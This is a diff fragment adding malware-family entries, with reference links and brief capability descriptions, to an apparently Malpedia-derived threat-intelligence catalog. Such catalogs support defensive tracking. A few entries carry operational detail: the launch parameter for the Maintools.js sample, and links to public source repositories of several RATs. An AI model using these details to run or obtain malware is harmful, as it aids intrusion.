+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", + "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" + ] + }, + "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", + "value": "jSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", + "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/", + "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/" + ] + }, + "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", + "value": "Qarallax RAT", + "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT)." + }, + { + "meta": { + "synonyms": [ + "Quaverse RAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", + "https://www.digitrustgroup.com/java-rat-qrat/", + "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market" + ] + }, + "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", + "value": "QRat", + "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", + "https://github.com/shotskeber/Ratty" + ] + }, + "uuid": "da032a95-b02a-4af2-b563-69f686653af4", + "value": "Ratty", + "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", + "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" + ] + }, + "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", + "value": "AIRBREAK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", + "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" + ] + }, + "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", + "value": "Bateleur", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", + "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", + "https://twitter.com/JohnLaTwC/status/983011262731714565" + ] + }, + "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", + "value": "CryptoNight", + "description": "WebAssembly-based crpyto miner." 
+ }, + { + "meta": { + "synonyms": [ + "Roblox Trade Assist" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx", + "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" + ] + }, + "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", + "value": "CukieGrab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", + "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/", + "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack" + ] + }, + "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", + "value": "KopiLuwak", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", + "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/" + ] + }, + "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", + "value": "magecart", + "description": "" + }, + { + "meta": { + "synonyms": [ + "SpicyOmelette" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", + "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", + "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", + "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", + "https://blog.morphisec.com/cobalt-gang-2.0" + ] + }, + "uuid": 
"1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", + "value": "More_eggs", + "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet", + "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" + ] + }, + "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", + "value": "Powmet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", + "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "http://resources.infosecinstitute.com/scanbox-framework/" + ] + }, + "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", + "value": "scanbox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", + "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" + ] + }, + "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", + "value": "HTML5 Encoding", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools", + "https://twitter.com/JohnLaTwC/status/915590893155098629" + ] + }, + "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", + "value": "Maintools.js", + "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", + "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef", + "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f" + ] + }, + "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", + "value": "Unidentified 050 (APT32 Profiler)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" + ] + }, + "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", + "value": "witchcoven", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", + "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/", + "https://github.com/kai5263499/Bella", + "https://github.com/kai5263499/Bella" + ] + }, + "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", + "value": "Bella", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Mask", + "Appetite" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" + ] + }, + "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", + "value": "Careto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" + ] + }, + "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", + "value": "CoinThief", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", + "https://objective-see.com/blog/blog_0x2A.html" + ] + }, + "uuid": 
"076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", + "value": "Coldroot RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner", + "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" + ] + }, + "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", + "value": "CpuMeaner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater", + "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", + "https://digitasecurity.com/blog/2018/02/05/creativeupdater/", + "https://objective-see.com/blog/blog_0x29.html" + ] + }, + "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", + "value": "CreativeUpdater", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" 
+ ] + }, + "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", + "value": "Crisis", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider", + "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" + ] + }, + "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", + "value": "Crossrider", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster", + "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", + "https://www.f-secure.com/weblog/archives/00002466.html" + ] + }, + "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", + "value": "Dockster", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy", + "https://objective-see.com/blog/blog_0x32.html" + ] + }, + "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", + "value": "Dummy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx", + "https://github.com/Marten4n6/EvilOSX", + "https://twitter.com/JohnLaTwC/status/966139336436498432" + ] + }, + "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", + "value": "EvilOSX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", + "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", + "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" + ] + }, + "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", + "value": "FlashBack", + "description": "" + }, + { + "meta": 
{ + "synonyms": [ + "Quimitchin" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", + "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", + "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", + "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", + "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", + "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", + "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" + ] + }, + "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", + "value": "FruitFly", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", + "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" + ] + }, + "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", + "value": "HiddenLotus", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Revir" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", + "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", + "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" + ] + }, + "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", + "value": "iMuler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", + "https://objective-see.com/blog/blog_0x16.html", + 
"http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/", + "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html" + ] + }, + "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", + "value": "KeRanger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", + "https://objective-see.com/blog/blog_0x16.html", + "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", + "https://github.com/eset/malware-ioc/tree/master/keydnap" + ] + }, + "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", + "value": "Keydnap", + "description": "" + }, + { + "meta": { + "synonyms": [ + "KitM" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos", + "https://www.f-secure.com/weblog/archives/00002558.html" + ] + }, + "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", + "value": "Kitmos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "SedUploader", + "JHUHUGIT", + "JKEYSKW" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", + "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", + "https://objective-see.com/blog/blog_0x16.html", + "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf" + ] + }, + "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", + "value": "Komplex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu", + "https://objective-see.com/blog/blog_0x16.html", + 
"https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" + ] + }, + "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", + "value": "Laoshu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", + "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/", + "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis" + ] + }, + "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", + "value": "Leverage", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", + "https://iranthreats.github.io/resources/macdownloader-macos-malware/" + ] + }, + "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", + "value": "MacDownloader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller", + "https://objective-see.com/blog/blog_0x16.html" + ] + }, + "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", + "value": "MacInstaller", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", + "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service", + "https://objective-see.com/blog/blog_0x1E.html" + ] + }, + "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", + "value": "MacRansom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy", + "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" + ] + }, + "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", + "value": "MacSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx", + "https://objective-see.com/blog/blog_0x16.html" + ] + }, + "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", + "value": "MacVX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami", + "https://objective-see.com/blog/blog_0x26.html" + ] + }, + "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", + "value": "MaMi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", + "https://objective-see.com/blog/blog_0x16.html", + "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/" + ] + }, + "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "value": "Mokes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec", + "https://objective-see.com/blog/blog_0x20.html" + ] + }, + "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", + "value": "Mughthesec", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", + "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" + ] + }, + "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", + "value": "OceanLotus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", + 
"http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", + "https://news.drweb.com/show/?i=1750&lng=en&c=14" + ] + }, + "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", + "value": "Olyx", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Findzip" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", + "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" + ] + }, + "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", + "value": "Patcher", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", + "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/" + ] + }, + "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", + "value": "Pirrit", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Calisto" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", + "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", + "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/", + "https://objective-see.com/blog/blog_0x1D.html", + "https://securelist.com/calisto-trojan-for-macos/86543/", + "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/", + "https://objective-see.com/blog/blog_0x1F.html", + "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", + "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", + "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" + ] + }, + "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44", + 
"value": "Proton RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet", + "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/" + ] + }, + "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb", + "value": "Pwnet", + "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack." + }, + { + "meta": { + "synonyms": [ + "Retefe" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", + "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", + "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", + "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/", + "https://www.govcert.admin.ch/blog/33/the-retefe-saga" + ] + }, + "uuid": "80acc956-d418-42e3-bddf-078695a01289", + "value": "Dok", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd", + "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" + ] + }, + "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", + "value": "systemd", + "description": "General purpose backdoor" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos", + "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", + "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" + ] + }, + "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", + "value": "Uroburos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", + " https://401trg.pw/an-update-on-winnti/", + "https://401trg.pw/winnti-evolution-going-open-source/" + ] + }, + "uuid": 
"7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", + "value": "Winnti", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker", + "https://objective-see.com/blog/blog_0x16.html", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + ] + }, + "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", + "value": "WireLurker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", + "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", + "https://news.drweb.com/show/?i=2679&lng=en&c=14" + ] + }, + "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", + "value": "Wirenet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", + "https://twitter.com/PhysicalDrive0/status/845009226388918273", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" + ] + }, + "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "value": "X-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd", + "https://objective-see.com/blog/blog_0x16.html" + ] + }, + "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", + "value": "XSLCmd", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", + "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", + "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" + ] + }, + "uuid": 
"e6a40fa2-f79f-40e9-89d3-a56984bc51f7", + "value": "PAS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Webshell by Orb" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", + "https://github.com/wso-shell", + "https://securelist.com/energetic-bear-crouching-yeti/85345/" + ] + }, + "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", + "value": "WSO", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90", + "value": "Silence DDoS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", + "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" + ] + }, + "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", + "value": "BONDUPDATER", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", + "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless" + ] + }, + "uuid": "0db05333-2214-49c3-b469-927788932aaa", + "value": "GhostMiner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy", + "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", + "https://github.com/matthewdunwoody/POSHSPY" + ] + }, + "uuid": "4df1b257-c242-46b0-b120-591430066b6f", + "value": "POSHSPY", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware", + "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" + ] + }, 
